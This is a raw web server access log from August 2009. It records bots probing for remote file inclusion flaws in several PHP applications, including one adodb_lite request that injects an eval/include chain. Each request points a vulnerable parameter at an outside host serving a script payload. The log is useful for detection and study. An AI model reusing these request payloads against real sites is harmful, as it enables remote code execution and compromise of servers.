85.199.173.101 - - [03/Aug/2009:01:52:18 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/aid.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.813"
85.199.173.101 - - [03/Aug/2009:01:52:18 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/aid.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.813"
85.199.173.101 - - [03/Aug/2009:01:52:19 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/aid.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.813"
85.199.173.101 - - [03/Aug/2009:01:52:19 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/aid.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.813"
209.172.33.230 - - [03/Aug/2009:01:53:46 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 246 "-" "libwww-perl/5.812"
209.172.33.230 - - [03/Aug/2009:01:53:46 -0400] "GET /logs/access_log.Q109051100//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 273 "-" "libwww-perl/5.812"
209.172.33.230 - - [03/Aug/2009:01:53:46 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 251 "-" "libwww-perl/5.812"
174.143.240.203 - - [03/Aug/2009:01:53:57 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://mp3dolls.dp.ua/config/bajocdm2.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.805"
174.143.240.203 - - [03/Aug/2009:01:53:57 -0400] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://mp3dolls.dp.ua/config/bajocdm2.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
174.143.240.203 - - [03/Aug/2009:01:54:07 -0400] "GET /logs/access_log.Q109062400/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://mp3dolls.dp.ua/config/bajocdm2.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.805"
209.172.33.230 - - [03/Aug/2009:01:54:32 -0400] "GET /logs/access_log.Q109051600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 273 "-" "libwww-perl/5.812"
163.24.136.10 - - [03/Aug/2009:01:54:46 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
163.24.136.10 - - [03/Aug/2009:01:54:46 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
64.34.176.211 - - [03/Aug/2009:01:55:32 -0400] "GET /logs/access_log.Q109051100//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
64.34.176.211 - - [03/Aug/2009:01:55:32 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
64.34.176.211 - - [03/Aug/2009:01:55:33 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
212.124.37.50 - - [03/Aug/2009:01:55:52 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:01:55:52 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:01:55:52 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:01:55:52 -0400] "GET /logs/access_log.Q109061300/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:01:55:52 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:01:55:52 -0400] "GET /logs/access_log.Q109061300/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:01:55:53 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
209.59.12.99 - - [03/Aug/2009:01:55:53 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.124.37.50 - - [03/Aug/2009:01:55:53 -0400] "GET /logs/access_log.Q109061300/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:01:55:53 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
85.199.173.101 - - [03/Aug/2009:01:56:01 -0400] "GET /logs/access_log.Q109061200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/aid.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.813"
94.23.197.26 - - [03/Aug/2009:01:56:02 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
94.23.197.26 - - [03/Aug/2009:01:56:02 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
85.199.173.101 - - [03/Aug/2009:01:56:02 -0400] "GET /logs/access_log.Q109061200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/aid.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.813"
94.23.197.26 - - [03/Aug/2009:01:56:02 -0400] "GET /logs/access_log.Q109061300/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
94.23.197.26 - - [03/Aug/2009:01:56:11 -0400] "GET /logs/access_log.Q109062100/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:01:56:14 -0400] "GET /logs/access_log.Q109061300%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:01:56:15 -0400] "GET /logs/access_log.Q109061300%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:01:56:16 -0400] "GET /logs/access_log.Q109061300%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:01:56:22 -0400] "GET /logs/access_log.Q109062100%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:01:56:24 -0400] "GET /logs/access_log.Q109062100%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:01:56:29 -0400] "GET /logs/access_log.Q109062100%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
114.32.40.221 - - [03/Aug/2009:01:56:54 -0400] "GET /?sourcedir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
114.32.40.221 - - [03/Aug/2009:01:56:54 -0400] "GET /logs/?sourcedir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 200 12138 "-" "Mozilla/5.0"
114.32.40.221 - - [03/Aug/2009:01:57:06 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
114.32.40.221 - - [03/Aug/2009:01:57:06 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
94.23.197.26 - - [03/Aug/2009:01:57:08 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.803"
94.23.197.26 - - [03/Aug/2009:01:57:08 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
94.23.197.26 - - [03/Aug/2009:01:57:08 -0400] "GET /logs/access_log.Q109061300/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.803"
94.23.197.26 - - [03/Aug/2009:01:57:11 -0400] "GET /logs/access_log.Q109062100/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.803"
212.124.37.50 - - [03/Aug/2009:01:57:14 -0400] "GET /logs/access_log.Q109062100/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:01:57:14 -0400] "GET /logs/access_log.Q109062100/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:01:57:15 -0400] "GET /logs/access_log.Q109062100/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
64.34.176.211 - - [03/Aug/2009:01:57:23 -0400] "GET /logs/access_log.Q109051600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
94.23.197.26 - - [03/Aug/2009:01:57:38 -0400] "GET /logs/access_log.Q109061300%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
94.23.197.26 - - [03/Aug/2009:01:57:39 -0400] "GET /logs/access_log.Q109062100%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
94.23.197.26 - - [03/Aug/2009:01:57:50 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
94.23.197.26 - - [03/Aug/2009:01:57:50 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.803"
94.23.197.26 - - [03/Aug/2009:01:57:51 -0400] "GET /logs/access_log.Q109061300/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.803"
94.23.197.26 - - [03/Aug/2009:01:57:52 -0400] "GET /logs/access_log.Q109062100/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.803"
75.125.35.18 - - [03/Aug/2009:01:57:54 -0400] "GET /logs/access_log.Q109051100//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.826"
75.125.35.18 - - [03/Aug/2009:01:57:54 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.826"
75.125.35.18 - - [03/Aug/2009:01:57:54 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.826"
114.32.40.221 - - [03/Aug/2009:01:58:15 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
114.32.40.221 - - [03/Aug/2009:01:58:15 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.244.236.248 - - [03/Aug/2009:01:58:39 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.244.236.248 - - [03/Aug/2009:01:58:39 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
64.34.176.211 - - [03/Aug/2009:01:59:19 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.34.176.211 - - [03/Aug/2009:01:59:19 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
64.34.176.211 - - [03/Aug/2009:01:59:19 -0400] "GET /logs/access_log.Q109051100%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
75.125.35.18 - - [03/Aug/2009:02:00:12 -0400] "GET /logs/access_log.Q109051600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.826"
86.58.155.104 - - [03/Aug/2009:02:00:25 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
86.58.155.104 - - [03/Aug/2009:02:00:25 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
86.58.155.104 - - [03/Aug/2009:02:00:25 -0400] "GET /logs/access_log.Q109051100%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
67.212.186.138 - - [03/Aug/2009:02:00:28 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
67.212.186.138 - - [03/Aug/2009:02:00:28 -0400] "GET /logs/access_log.Q109060200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
67.212.186.138 - - [03/Aug/2009:02:00:28 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
67.212.186.138 - - [03/Aug/2009:02:00:28 -0400] "GET /logs/access_log.Q109061100//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
209.59.12.99 - - [03/Aug/2009:02:00:53 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.118.117.124 - - [03/Aug/2009:02:01:03 -0400] "GET //index.php?DOCUMENT_ROOT=http://utenti.lycos.it/roxe/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
87.118.117.124 - - [03/Aug/2009:02:01:03 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://utenti.lycos.it/roxe/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.118.117.124 - - [03/Aug/2009:02:01:03 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://utenti.lycos.it/roxe/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.118.117.124 - - [03/Aug/2009:02:01:03 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://utenti.lycos.it/roxe/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.34.176.211 - - [03/Aug/2009:02:01:35 -0400] "GET /logs/access_log.Q109051600%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
75.125.35.18 - - [03/Aug/2009:02:01:35 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
75.125.35.18 - - [03/Aug/2009:02:01:35 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
75.125.35.18 - - [03/Aug/2009:02:01:37 -0400] "GET /logs/access_log.Q109051100%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
75.125.35.18 - - [03/Aug/2009:02:02:14 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
75.125.35.18 - - [03/Aug/2009:02:02:14 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
75.125.35.18 - - [03/Aug/2009:02:02:16 -0400] "GET /logs/access_log.Q109051100%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
75.125.35.18 - - [03/Aug/2009:02:02:19 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
75.125.35.18 - - [03/Aug/2009:02:02:21 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
75.125.35.18 - - [03/Aug/2009:02:02:21 -0400] "GET /logs/access_log.Q109051100%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
86.58.155.104 - - [03/Aug/2009:02:02:32 -0400] "GET /logs/access_log.Q109051600%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
66.46.177.182 - - [03/Aug/2009:02:02:42 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.inf.uniri.hr/mambots/perkosa.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
66.46.177.182 - - [03/Aug/2009:02:02:43 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.inf.uniri.hr/mambots/perkosa.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
66.46.177.182 - - [03/Aug/2009:02:02:43 -0400] "GET /logs/access_log.Q109070300/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.inf.uniri.hr/mambots/perkosa.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
66.46.177.182 - - [03/Aug/2009:02:02:43 -0400] "GET /logs/access_log.Q109052900/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.inf.uniri.hr/mambots/perkosa.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
75.125.35.18 - - [03/Aug/2009:02:02:48 -0400] "GET /logs/access_log.Q109051100%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
75.125.35.18 - - [03/Aug/2009:02:02:48 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
75.125.35.18 - - [03/Aug/2009:02:02:48 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.46.177.182 - - [03/Aug/2009:02:02:50 -0400] "GET /logs/access_log.Q109052900/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.inf.uniri.hr/mambots/perkosa.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
66.46.177.182 - - [03/Aug/2009:02:02:50 -0400] "GET /logs/access_log.Q109070300/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.inf.uniri.hr/mambots/perkosa.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
66.46.177.182 - - [03/Aug/2009:02:02:50 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.inf.uniri.hr/mambots/perkosa.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
85.199.173.101 - - [03/Aug/2009:02:02:52 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/aid.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.813"
66.46.177.182 - - [03/Aug/2009:02:02:53 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.inf.uniri.hr/mambots/perkosa.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
85.199.173.101 - - [03/Aug/2009:02:02:54 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/aid.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.813"
87.118.117.124 - - [03/Aug/2009:02:03:16 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://utenti.lycos.it/roxe/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.118.117.124 - - [03/Aug/2009:02:03:16 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://utenti.lycos.it/roxe/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.212.186.138 - - [03/Aug/2009:02:03:30 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
67.212.186.138 - - [03/Aug/2009:02:03:30 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
